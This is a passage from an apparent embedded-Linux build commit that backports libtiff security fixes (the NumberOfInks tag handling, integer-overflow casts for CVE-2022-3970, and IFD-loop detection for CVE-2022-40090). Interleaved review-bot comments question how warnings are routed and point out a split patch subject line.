++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the number of inks %"PRIu16".\n -> NumberOfInks value adapted to %"PRIu16"",
++ tif->tif_name, fip->field_name, td->td_numberofinks, ninksinstring, ninksinstring);
++ td->td_numberofinks = ninksinstring;
++ }
++ } else {
++ td->td_numberofinks = ninksinstring;
++ TIFFSetFieldBit(tif, FIELD_NUMBEROFINKS);
++ }
++ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++ {
++ if (td->td_numberofinks != td->td_samplesperpixel) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu16" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++ tif->tif_name, fip->field_name, td->td_numberofinks, td->td_samplesperpixel);
++ }
++ }
++ }
++ }
++ break;
++ case TIFFTAG_NUMBEROFINKS:
++ v = (uint16)va_arg(ap, uint16_vap);
++ /* If InkNames already set also NumberOfInks is set accordingly and should be equal */
++ if (TIFFFieldSet(tif, FIELD_INKNAMES))
++ {
++ if (v != td->td_numberofinks) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Error %s; Tag %s:\n It is not possible to set the value %"PRIu32" for NumberOfInks\n which is different from the number of inks in the InkNames tag (%"PRIu16")",
++ tif->tif_name, fip->field_name, v, td->td_numberofinks);
++ /* Do not set / overwrite number of inks already set by InkNames case accordingly. */
++ status = 0;
++ }
++ } else {
++ td->td_numberofinks = (uint16)v;
++ if (TIFFFieldSet(tif, FIELD_SAMPLESPERPIXEL))
++ {
++ if (td->td_numberofinks != td->td_samplesperpixel) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Warning %s; Tag %s:\n Value %"PRIu32" of NumberOfInks is different from the SamplesPerPixel value %"PRIu16"",
++ tif->tif_name, fip->field_name, v, td->td_samplesperpixel);
++ }
++ }
+ }
+ break;
+ case TIFFTAG_PERSAMPLE:
+@@ -887,34 +934,6 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ if (fip->field_bit == FIELD_CUSTOM) {
+ standard_tag = 0;
+ }
+-
+- if( standard_tag == TIFFTAG_NUMBEROFINKS )
+- {
+- int i;
+- for (i = 0; i < td->td_customValueCount; i++) {
+- uint16 val;
+- TIFFTagValue *tv = td->td_customValues + i;
+- if (tv->info->field_tag != standard_tag)
+- continue;
+- if( tv->value == NULL )
+- return 0;
+- val = *(uint16 *)tv->value;
+- /* Truncate to SamplesPerPixel, since the */
+- /* setting code for INKNAMES assume that there are SamplesPerPixel */
+- /* inknames. */
+- /* Fixes http://bugzilla.maptools.org/show_bug.cgi?id=2599 */
+- if( val > td->td_samplesperpixel )
+- {
+- TIFFWarningExt(tif->tif_clientdata,"_TIFFVGetField",
+- "Truncating NumberOfInks from %u to %u",
+- val, td->td_samplesperpixel);
+- val = td->td_samplesperpixel;
+- }
+- *va_arg(ap, uint16*) = val;
+- return 1;
+- }
+- return 0;
+- }
+
+ switch (standard_tag) {
+ case TIFFTAG_SUBFILETYPE:
+@@ -1092,6 +1111,9 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ case TIFFTAG_INKNAMES:
+ *va_arg(ap, char**) = td->td_inknames;
+ break;
++ case TIFFTAG_NUMBEROFINKS:
++ *va_arg(ap, uint16 *) = td->td_numberofinks;
++ break;
+ default:
+ {
+ int i;
+diff --git a/libtiff/tif_dir.h b/libtiff/tif_dir.h
+index e7f0667..7cad679 100644
+--- a/libtiff/tif_dir.h
++++ b/libtiff/tif_dir.h
+@@ -117,6 +117,7 @@ typedef struct {
+ /* CMYK parameters */
+ int td_inknameslen;
+ char* td_inknames;
++ uint16 td_numberofinks; /* number of inks in InkNames string */
+
+ int td_customValueCount;
+ TIFFTagValue *td_customValues;
+@@ -174,6 +175,7 @@ typedef struct {
+ #define FIELD_TRANSFERFUNCTION 44
+ #define FIELD_INKNAMES 46
+ #define FIELD_SUBIFD 49
++#define FIELD_NUMBEROFINKS 50
+ /* FIELD_CUSTOM (see tiffio.h) 65 */
+ /* end of support for well-known tags; codec-private tags follow */
+ #define FIELD_CODEC 66 /* base of codec-private tags */
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index fbfaaf0..bf7de70 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -104,7 +104,7 @@ tiffFields[] = {
+ { TIFFTAG_SUBIFD, -1, -1, TIFF_IFD8, 0, TIFF_SETGET_C16_IFD8, TIFF_SETGET_UNDEFINED, FIELD_SUBIFD, 1, 1, "SubIFD", (TIFFFieldArray*) &tiffFieldArray },
+ { TIFFTAG_INKSET, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "InkSet", NULL },
+ { TIFFTAG_INKNAMES, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_C16_ASCII, TIFF_SETGET_UNDEFINED, FIELD_INKNAMES, 1, 1, "InkNames", NULL },
+- { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "NumberOfInks", NULL },
++ { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_NUMBEROFINKS, 1, 0, "NumberOfInks", NULL },
+ { TIFFTAG_DOTRANGE, 2, 2, TIFF_SHORT, 0, TIFF_SETGET_UINT16_PAIR, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "DotRange", NULL },
+ { TIFFTAG_TARGETPRINTER, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_ASCII, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "TargetPrinter", NULL },
+ { TIFFTAG_EXTRASAMPLES, -1, -1, TIFF_SHORT, 0, TIFF_SETGET_C16_UINT16, TIFF_SETGET_UNDEFINED, FIELD_EXTRASAMPLES, 0, 1, "ExtraSamples", NULL },
+diff --git a/libtiff/tif_dirwrite.c b/libtiff/tif_dirwrite.c
+index 9e4d306..a2dbc3b 100644
+--- a/libtiff/tif_dirwrite.c
++++ b/libtiff/tif_dirwrite.c
+@@ -677,6 +677,11 @@ TIFFWriteDirectorySec(TIFF* tif, int isimage, int imagedone, uint64* pdiroff)
+ if (!TIFFWriteDirectoryTagAscii(tif,&ndir,dir,TIFFTAG_INKNAMES,tif->tif_dir.td_inknameslen,tif->tif_dir.td_inknames))
+ goto bad;
+ }
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++ {
++ if (!TIFFWriteDirectoryTagShort(tif, &ndir, dir, TIFFTAG_NUMBEROFINKS, tif->tif_dir.td_numberofinks))
++ goto bad;
++ }
+ if (TIFFFieldSet(tif,FIELD_SUBIFD))
+ {
+ if (!TIFFWriteDirectoryTagSubifd(tif,&ndir,dir))
+diff --git a/libtiff/tif_print.c b/libtiff/tif_print.c
+index a073794..a9f05a7 100644
+--- a/libtiff/tif_print.c
++++ b/libtiff/tif_print.c
+@@ -402,6 +402,10 @@ TIFFPrintDirectory(TIFF* tif, FILE* fd, long flags)
+ }
+ fputs("\n", fd);
+ }
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS)) {
++ fprintf(fd, " NumberOfInks: %d\n",
++ td->td_numberofinks);
++ }
+ if (TIFFFieldSet(tif,FIELD_THRESHHOLDING)) {
+ fprintf(fd, " Thresholding: ");
+ switch (td->td_threshholding) {
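Review bot: The three messages that begin with "Warning" in the new `TIFFTAG_INKNAMES` and `TIFFTAG_NUMBEROFINKS` cases of `_TIFFVSetField` are emitted through `TIFFErrorExt`, even though the tag is still accepted on those paths. In the InkNames case `status` is `ninksinstring > 0`, which is true inside that branch. A client that installs an error handler and treats any call to it as a failed parse will therefore reject files the library has just corrected and accepted. Routing these three through the warning handler would match their wording, e.g. `TIFFWarningExt(tif->tif_clientdata, module, "Warning %s; Tag %s: ...", ...)`, the same call the removed `_TIFFVGetField` block used. The "Error" message in the NumberOfInks case sets `status = 0` and should stay on `TIFFErrorExt`. If the text is kept identical to upstream on purpose, say so in the patch header.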
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
new file mode 100644
index 0000000000..ea70827cbe
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
@@ -0,0 +1,45 @@
+From 7e87352217d1f0c77eee7033ac59e3aab08532bb Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 8 Nov 2022 15:16:58 +0100
+Subject: [PATCH] TIFFReadRGBATileExt(): fix (unsigned) integer overflow on
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3970
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/227500897dfb07fb7d27f7aa570050e62617e3be
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ strips/tiles > 2 GB
+
+Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53137
+
+---
+ libtiff/tif_getimage.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 96ab146..0b90dcc 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -3042,15 +3042,15 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 col, uint32 row, uint32 * raster, int stop
+ return( ok );
+
+ for( i_row = 0; i_row < read_ysize; i_row++ ) {
+- memmove( raster + (tile_ysize - i_row - 1) * tile_xsize,
+- raster + (read_ysize - i_row - 1) * read_xsize,
++ memmove( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
++ raster + (size_t)(read_ysize - i_row - 1) * read_xsize,
+ read_xsize * sizeof(uint32) );
+- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize+read_xsize,
++ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize+read_xsize,
+ 0, sizeof(uint32) * (tile_xsize - read_xsize) );
+ }
+
+ for( i_row = read_ysize; i_row < tile_ysize; i_row++ ) {
+- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize,
++ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
+ 0, sizeof(uint32) * tile_xsize );
+ }
+
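Review bot: The patch header splits its own subject: `Subject: [PATCH] TIFFReadRGBATileExt(): fix (unsigned) integer overflow on` ends mid-phrase, and its continuation `strips/tiles > 2 GB` is stranded below the `Upstream-Status`, `CVE`, `Signed-off-by`, `Origin`, `Reviewed-by` and `Last-Update` lines inserted in between. Anyone reading the header, or a tool that takes the first paragraph as the summary, sees a truncated description of what the overflow fix covers. Keep the subject and its continuation together and move the trailer block directly above the `---` separator, as the CVE-2022-40090 patch in this same commit does. The code change itself is a cast-only edit inside TIFFReadRGBATileExt(), whose body starts outside the hunk.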
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
new file mode 100644
index 0000000000..0a88f59553
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
@@ -0,0 +1,548 @@
+From d385738335deb0c4bb70449f12e411f2203c0d01 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 2 Sep 2022 21:20:28 +0200
+Subject: [PATCH 1/4] Improved IFD-Loop Handling (fixes #455)
+
+Basic approach:
+- The order in the entire chain must be checked, and not only whether an offset has already been read once.
+- To do this, pairs of directory number and offset are stored and checked.
+- The offset of a directory number can change.
+- TIFFAdvanceDirectory() must also perform an IFD loop check.
+- TIFFCheckDirOffset() is replaced by _TIFFCheckDirNumberAndOffset().
+
+Rules for the check:
+- If an offset is already in the list, it must have the same IFD number. Otherwise it is an IDF loop.
+- If the offset is not in the list and the IFD number is greater than there are list entries, a new list entry is added.
+- Otherwise, the offset of the IFD number is updated.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2022-40090.patch?h=ubuntu/focal-security
+Upstream commit
+https://gitlab.com/libtiff/libtiff/-/commit/c7caec9a4d8f24c17e667480d2c7d0d51c9fae41]
+CVE: CVE-2022-40090
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_close.c | 6 ++-
+ libtiff/tif_dir.c | 91 +++++++++++++++++++++++++----------------
+ libtiff/tif_dir.h | 1 +
+ libtiff/tif_dirread.c | 94 ++++++++++++++++++++++++++++++-------------
+ libtiff/tif_open.c | 3 +-
+ libtiff/tiffiop.h | 3 +-
+ 6 files changed, 131 insertions(+), 67 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_close.c
++++ tiff-4.1.0+git191117/libtiff/tif_close.c
+@@ -52,8 +52,10 @@ TIFFCleanup(TIFF* tif)
+ (*tif->tif_cleanup)(tif);
+ TIFFFreeDirectory(tif);
+
+- if (tif->tif_dirlist)
+- _TIFFfree(tif->tif_dirlist);
++ if (tif->tif_dirlistoff)
++ _TIFFfree(tif->tif_dirlistoff);
++ if (tif->tif_dirlistdirn)
++ _TIFFfree(tif->tif_dirlistdirn);
+
+ /*
+ * Clean up client info links.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.c
++++ tiff-4.1.0+git191117/libtiff/tif_dir.c
+@@ -1463,12 +1463,22 @@ TIFFDefaultDirectory(TIFF* tif)
+ }
+
+ static int
+-TIFFAdvanceDirectory(TIFF* tif, uint64* nextdir, uint64* off)
++TIFFAdvanceDirectory(TIFF* tif, uint64* nextdiroff, uint64* off, uint16* nextdirnum)
+ {
+ static const char module[] = "TIFFAdvanceDirectory";
++
++ /* Add this directory to the directory list, if not already in. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++ TIFFErrorExt(tif->tif_clientdata, module, "Starting directory %hu at offset 0x%lx (%lu) might cause an IFD loop",
++ *nextdirnum, *nextdiroff, *nextdiroff);
++ *nextdiroff = 0;
++ *nextdirnum = 0;
++ return(0);
++ }
++
+ if (isMapped(tif))
+ {
+- uint64 poff=*nextdir;
++ uint64 poff=*nextdiroff;
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+ {
+ tmsize_t poffa,poffb,poffc,poffd;
+@@ -1479,7 +1489,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ if (((uint64)poffa!=poff)||(poffb<poffa)||(poffb<(tmsize_t)sizeof(uint16))||(poffb>tif->tif_size))
+ {
+ TIFFErrorExt(tif->tif_clientdata,module,"Error fetching directory count");
+- *nextdir=0;
++ *nextdiroff=0;
+ return(0);
+ }
+ _TIFFmemcpy(&dircount,tif->tif_base+poffa,sizeof(uint16));
+@@ -1497,7 +1507,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ _TIFFmemcpy(&nextdir32,tif->tif_base+poffc,sizeof(uint32));
+ if (tif->tif_flags&TIFF_SWAB)
+ TIFFSwabLong(&nextdir32);
+- *nextdir=nextdir32;
++ *nextdiroff=nextdir32;
+ }
+ else
+ {
+@@ -1529,11 +1539,10 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ }
+ if (off!=NULL)
+ *off=(uint64)poffc;
+- _TIFFmemcpy(nextdir,tif->tif_base+poffc,sizeof(uint64));
++ _TIFFmemcpy(nextdiroff,tif->tif_base+poffc,sizeof(uint64));
+ if (tif->tif_flags&TIFF_SWAB)
+- TIFFSwabLong8(nextdir);
++ TIFFSwabLong8(nextdiroff);
+ }
+- return(1);
+ }
+ else
+ {
+@@ -1541,7 +1550,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ {
+ uint16 dircount;
+ uint32 nextdir32;
+- if (!SeekOK(tif, *nextdir) ||
++ if (!SeekOK(tif, *nextdiroff) ||
+ !ReadOK(tif, &dircount, sizeof (uint16))) {
+ TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ tif->tif_name);
+@@ -1562,13 +1571,13 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ }
+ if (tif->tif_flags & TIFF_SWAB)
+ TIFFSwabLong(&nextdir32);
+- *nextdir=nextdir32;
++ *nextdiroff=nextdir32;
+ }
+ else
+ {
+ uint64 dircount64;
+ uint16 dircount16;
+- if (!SeekOK(tif, *nextdir) ||
++ if (!SeekOK(tif, *nextdiroff) ||
+ !ReadOK(tif, &dircount64, sizeof (uint64))) {
+ TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ tif->tif_name);
+@@ -1588,17 +1597,27 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ else
+ (void) TIFFSeekFile(tif,
+ dircount16*20, SEEK_CUR);
+- if (!ReadOK(tif, nextdir, sizeof (uint64))) {
++ if (!ReadOK(tif, nextdiroff, sizeof (uint64))) {
+ TIFFErrorExt(tif->tif_clientdata, module,
+ "%s: Error fetching directory link",
+ tif->tif_name);
+ return (0);
+ }
+ if (tif->tif_flags & TIFF_SWAB)
+- TIFFSwabLong8(nextdir);
++ TIFFSwabLong8(nextdiroff);
+ }
+- return (1);
+ }
++ if (*nextdiroff != 0) {
++ (*nextdirnum)++;
++ /* Check next directory for IFD looping and if so, set it as last directory. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++ TIFFWarningExt(tif->tif_clientdata, module, "the next directory %hu at offset 0x%lx (%lu) might be an IFD loop. Treating directory %hu as last directory",
++ *nextdirnum, *nextdiroff, *nextdiroff, *nextdirnum-1);
++ *nextdiroff = 0;
++ (*nextdirnum)--;
++ }
++ }
++ return (1);
+ }
+
+ /*
+@@ -1608,14 +1627,16 @@ uint16
+ TIFFNumberOfDirectories(TIFF* tif)
+ {
+ static const char module[] = "TIFFNumberOfDirectories";
+- uint64 nextdir;
++ uint64 nextdiroff;
++ uint16 nextdirnum;
+ uint16 n;
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+- nextdir = tif->tif_header.classic.tiff_diroff;
++ nextdiroff = tif->tif_header.classic.tiff_diroff;
+ else
+- nextdir = tif->tif_header.big.tiff_diroff;
++ nextdiroff = tif->tif_header.big.tiff_diroff;
++ nextdirnum = 0;
+ n = 0;
+- while (nextdir != 0 && TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ while (nextdiroff != 0 && TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ {
+ if (n != 65535) {
+ ++n;
+@@ -1638,28 +1659,30 @@ TIFFNumberOfDirectories(TIFF* tif)
+ int
+ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ {
+- uint64 nextdir;
++ uint64 nextdiroff;
++ uint16 nextdirnum;
+ uint16 n;
+
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+- nextdir = tif->tif_header.classic.tiff_diroff;
++ nextdiroff = tif->tif_header.classic.tiff_diroff;
+ else
+- nextdir = tif->tif_header.big.tiff_diroff;
+- for (n = dirn; n > 0 && nextdir != 0; n--)
+- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ nextdiroff = tif->tif_header.big.tiff_diroff;
++ nextdirnum = 0;
++ for (n = dirn; n > 0 && nextdiroff != 0; n--)
++ if (!TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ return (0);
+- tif->tif_nextdiroff = nextdir;
++ /* If the n-th directory could not be reached (does not exist),
++ * return here without touching anything further. */
++ if (nextdiroff == 0 || n > 0)
++ return (0);
++
++ tif->tif_nextdiroff = nextdiroff;
+ /*
+ * Set curdir to the actual directory index. The
+ * -1 is because TIFFReadDirectory will increment
+ * tif_curdir after successfully reading the directory.
+ */
+ tif->tif_curdir = (dirn - n) - 1;
+- /*
+- * Reset tif_dirnumber counter and start new list of seen directories.
+- * We need this to prevent IFD loops.
+- */
+- tif->tif_dirnumber = 0;
+ return (TIFFReadDirectory(tif));
+ }
+
+@@ -1672,13 +1695,42 @@ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ int
+ TIFFSetSubDirectory(TIFF* tif, uint64 diroff)
+ {
+- tif->tif_nextdiroff = diroff;
+- /*
+- * Reset tif_dirnumber counter and start new list of seen directories.
+- * We need this to prevent IFD loops.
++ /* Match nextdiroff and curdir for consistent IFD-loop checking.
++ * Only with TIFFSetSubDirectory() the IFD list can be corrupted with invalid offsets
++ * within the main IFD tree.
++ * In the case of several subIFDs of a main image,
++ * there are two possibilities that are not even mutually exclusive.
++ * a.) The subIFD tag contains an array with all offsets of the subIFDs.
++ * b.) The SubIFDs are concatenated with their NextIFD parameters.
++ * (refer to https://www.awaresystems.be/imaging/tiff/specification/TIFFPM6.pdf.)
+ */
+- tif->tif_dirnumber = 0;
+- return (TIFFReadDirectory(tif));
++ int retval;
++ uint16 curdir = 0;
++ int8 probablySubIFD = 0;
++ if (diroff == 0) {
++ /* Special case to invalidate the tif_lastdiroff member. */
++ tif->tif_curdir = 65535;
++ } else {
++ if (!_TIFFGetDirNumberFromOffset(tif, diroff, &curdir)) {
++ /* Non-existing offsets might point to a SubIFD or invalid IFD.*/
++ probablySubIFD = 1;
++ }
++ /* -1 because TIFFReadDirectory() will increment tif_curdir. */
++ tif->tif_curdir = curdir - 1;
++ }
++
++ tif->tif_nextdiroff = diroff;
++ retval = TIFFReadDirectory(tif);
++ /* If failed, curdir was not incremented in TIFFReadDirectory(), so set it back. */
++ if (!retval )tif->tif_curdir++;
++ if (retval && probablySubIFD) {
++ /* Reset IFD list to start new one for SubIFD chain and also start SubIFD chain with tif_curdir=0. */
++ tif->tif_dirnumber = 0;
++ tif->tif_curdir = 0; /* first directory of new chain */
++ /* add this offset to new IFD list */
++ _TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir, diroff);
++ }
++ return (retval);
+ }
+
+ /*
+@@ -1702,12 +1754,15 @@ TIFFLastDirectory(TIFF* tif)
+
+ /*
+ * Unlink the specified directory from the directory chain.
++ * Note: First directory starts with number dirn=1.
++ * This is different to TIFFSetDirectory() where the first directory starts with zero.
+ */
+ int
+ TIFFUnlinkDirectory(TIFF* tif, uint16 dirn)
+ {
+ static const char module[] = "TIFFUnlinkDirectory";
+ uint64 nextdir;
++ uint16 nextdirnum;
+ uint64 off;
+ uint16 n;
+
+@@ -1731,19 +1786,21 @@ TIFFUnlinkDirectory(TIFF* tif, uint16 di
+ nextdir = tif->tif_header.big.tiff_diroff;
+ off = 8;
+ }
++ nextdirnum = 0; /* First directory is dirn=0 */
++
+ for (n = dirn-1; n > 0; n--) {
+ if (nextdir == 0) {
+ TIFFErrorExt(tif->tif_clientdata, module, "Directory %d does not exist", dirn);
+ return (0);
+ }
+- if (!TIFFAdvanceDirectory(tif, &nextdir, &off))
++ if (!TIFFAdvanceDirectory(tif, &nextdir, &off, &nextdirnum))
+ return (0);
+ }
+ /*
+ * Advance to the directory to be unlinked and fetch
+ * the offset of the directory that follows.
+ */
+- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ if (!TIFFAdvanceDirectory(tif, &nextdir, NULL, &nextdirnum))
+ return (0);
+ /*
+ * Go back and patch the link field of the preceding
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.h
++++ tiff-4.1.0+git191117/libtiff/tif_dir.h
+@@ -300,6 +300,8 @@ extern int _TIFFMergeFields(TIFF*, const
+ extern const TIFFField* _TIFFFindOrRegisterField(TIFF *, uint32, TIFFDataType);
+ extern TIFFField* _TIFFCreateAnonField(TIFF *, uint32, TIFFDataType);
+ extern int _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag);
++extern int _TIFFCheckDirNumberAndOffset(TIFF *tif, uint16 dirn, uint64 diroff);
++extern int _TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16 *dirn);
+
+ #if defined(__cplusplus)
+ }
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -158,7 +158,6 @@ static void TIFFReadDirectoryFindFieldIn
+
+ static int EstimateStripByteCounts(TIFF* tif, TIFFDirEntry* dir, uint16 dircount);
+ static void MissingRequired(TIFF*, const char*);
+-static int TIFFCheckDirOffset(TIFF* tif, uint64 diroff);
+ static int CheckDirCount(TIFF*, TIFFDirEntry*, uint32);
+ static uint16 TIFFFetchDirectory(TIFF* tif, uint64 diroff, TIFFDirEntry** pdir, uint64* nextdiroff);
+ static int TIFFFetchNormalTag(TIFF*, TIFFDirEntry*, int recover);
+@@ -3584,12 +3583,19 @@ TIFFReadDirectory(TIFF* tif)
+ int bitspersample_read = FALSE;
+ int color_channels;
+
+- tif->tif_diroff=tif->tif_nextdiroff;
+- if (!TIFFCheckDirOffset(tif,tif->tif_nextdiroff))
+- return 0; /* last offset or bad offset (IFD looping) */
+- (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
+- tif->tif_curdir++;
+- nextdiroff = tif->tif_nextdiroff;
++ if (tif->tif_nextdiroff == 0) {
++ /* In this special case, tif_diroff needs also to be set to 0. */
++ tif->tif_diroff = tif->tif_nextdiroff;
++ return 0; /* last offset, thus no checking necessary */
++ }
++
++ nextdiroff = tif->tif_nextdiroff;
++ /* tif_curdir++ and tif_nextdiroff should only be updated after SUCCESSFUL reading of the directory. Otherwise, invalid IFD offsets could corrupt the IFD list. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir + 1, nextdiroff)) {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Didn't read next directory due to IFD looping at offset 0x%lx (%lu) to offset 0x%lx (%lu)", tif->tif_diroff, tif->tif_diroff, nextdiroff, nextdiroff);
++ return 0; /* bad offset (IFD looping) */
++ }
+ dircount=TIFFFetchDirectory(tif,nextdiroff,&dir,&tif->tif_nextdiroff);
+ if (!dircount)
+ {
+@@ -3597,6 +3603,11 @@ TIFFReadDirectory(TIFF* tif)
+ "Failed to read directory at offset " TIFF_UINT64_FORMAT,nextdiroff);
+ return 0;
+ }
++ /* Set global values after a valid directory has been fetched.
++ * tif_diroff is already set to nextdiroff in TIFFFetchDirectory() in the beginning. */
++ tif->tif_curdir++;
++ (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
++
+ TIFFReadDirectoryCheckOrder(tif,dir,dircount);
+
+ /*
+@@ -4628,13 +4639,17 @@ MissingRequired(TIFF* tif, const char* t
+ }
+
+ /*
+- * Check the directory offset against the list of already seen directory
+- * offsets. This is a trick to prevent IFD looping. The one can create TIFF
+- * file with looped directory pointers. We will maintain a list of already
+- * seen directories and check every IFD offset against that list.
++ * Check the directory number and offset against the list of already seen
++ * directory numbers and offsets. This is a trick to prevent IFD looping.
++ * The one can create TIFF file with looped directory pointers. We will
++ * maintain a list of already seen directories and check every IFD offset
++ * and its IFD number against that list. However, the offset of an IFD number
++ * can change - e.g. when writing updates to file.
++ * Returns 1 if all is ok; 0 if last directory or IFD loop is encountered,
++ * or an error has occured.
+ */
+-static int
+-TIFFCheckDirOffset(TIFF* tif, uint64 diroff)
++int
++_TIFFCheckDirNumberAndOffset(TIFF* tif, uint16 dirn, uint64 diroff)
+ {
+ uint16 n;
+
+@@ -4646,35 +4661,64 @@ TIFFCheckDirOffset(TIFF* tif, uint64 dir
+ return 0;
+ }
+
+- for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlist; n++) {
+- if (tif->tif_dirlist[n] == diroff)
+- return 0;
++ /* Check if offset is already in the list:
++ * - yes: check, if offset is at the same IFD number - if not, it is an IFD loop
++ * - no: add to list or update offset at that IFD number
++ */
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ if (tif->tif_dirlistdirn[n] == dirn) {
++ return 1;
++ } else {
++ TIFFWarningExt(tif->tif_clientdata, "_TIFFCheckDirNumberAndOffset",
++ "TIFF directory %hu has IFD looping to directory %hu at offset 0x%lx (%lu)",
++ dirn-1, tif->tif_dirlistdirn[n], diroff, diroff);
++ return 0;
++ }
++ }
++ }
++ /* Check if offset of an IFD has been changed and update offset of that IFD number. */
++ if (dirn < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff) {
++ /* tif_dirlistdirn can have IFD numbers dirn in random order */
++ for (n = 0; n < tif->tif_dirnumber; n++) {
++ if (tif->tif_dirlistdirn[n] == dirn) {
++ tif->tif_dirlistoff[n] = diroff;
++ return 1;
++ }
++ }
+ }
+
++ /* Add IFD offset and dirn to IFD directory list */
+ tif->tif_dirnumber++;
+
+- if (tif->tif_dirlist == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
+- uint64* new_dirlist;
+-
++ if (tif->tif_dirlistoff == NULL || tif->tif_dirlistdirn == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
++ uint64 *new_dirlist;
+ /*
+ * XXX: Reduce memory allocation granularity of the dirlist
+ * array.
+ */
+- new_dirlist = (uint64*)_TIFFCheckRealloc(tif, tif->tif_dirlist,
+- tif->tif_dirnumber, 2 * sizeof(uint64), "for IFD list");
++ if (tif->tif_dirnumber >= 32768)
++ tif->tif_dirlistsize = 65535;
++ else
++ tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
++
